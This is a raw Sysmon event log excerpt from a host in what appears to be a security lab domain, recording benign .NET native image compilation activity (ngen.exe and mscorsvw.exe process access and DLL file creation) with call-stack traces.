13:22:21.934{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-458D-6000-5802-000000009A01}4688C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006488Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:21.918{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-458D-6000-5802-000000009A01}4688C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006487Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:21.918{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-458D-6000-5802-000000009A01}4688C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006486Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:22:21.840{08A6967A-458C-6000-5702-000000009A01}2820C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\b04-0\System.ComponentModel.Composition.dll2021-01-14 13:22:21.840 10341000x80000000000000006503Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:22.840{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-458E-6000-5C02-000000009A01}3672C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006502Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:22.825{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-458E-6000-5C02-000000009A01}3672C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006501Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:22.825{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-458E-6000-5C02-000000009A01}3672C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006500Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:22:22.762{08A6967A-458E-6000-5B02-000000009A01}2884C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\b44-0\System.ComponentModel.DataAnnotations.dll2021-01-14 13:22:22.762 10341000x80000000000000006499Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:22.496{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-458E-6000-5B02-000000009A01}2884C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006498Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:22.481{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-458E-6000-5B02-000000009A01}2884C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006497Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:22.481{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-458E-6000-5B02-000000009A01}2884C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006496Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:22.340{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-458E-6000-5A02-000000009A01}3900C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006495Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:22.340{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-458E-6000-5A02-000000009A01}3900C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006494Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:22.340{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-458E-6000-5A02-000000009A01}3900C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006493Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:22:22.278{08A6967A-458E-6000-5902-000000009A01}2432C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\980-0\System.ComponentModel.Composition.Registration.dll2021-01-14 13:22:22.278 10341000x80000000000000006492Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:22.090{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-458E-6000-5902-000000009A01}2432C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006491Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:22.075{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-458E-6000-5902-000000009A01}2432C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006490Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:22.075{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-458E-6000-5902-000000009A01}2432C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006513Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:23.590{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-458F-6000-5F02-000000009A01}4980C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006512Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:23.575{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-458F-6000-5F02-000000009A01}4980C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006511Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:23.575{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-458F-6000-5F02-000000009A01}4980C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006510Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:23.372{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-458F-6000-5E02-000000009A01}4116C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006509Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:23.356{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-458F-6000-5E02-000000009A01}4116C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006508Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:23.356{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-458F-6000-5E02-000000009A01}4116C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006507Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:22:23.309{08A6967A-458F-6000-5D02-000000009A01}984C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\3d8-0\System.Data.DataSetExtensions.dll2021-01-14 13:22:23.309 10341000x80000000000000006506Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:23.106{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-458F-6000-5D02-000000009A01}984C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006505Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:23.090{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-458F-6000-5D02-000000009A01}984C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006504Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:23.090{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-458F-6000-5D02-000000009A01}984C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006517Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 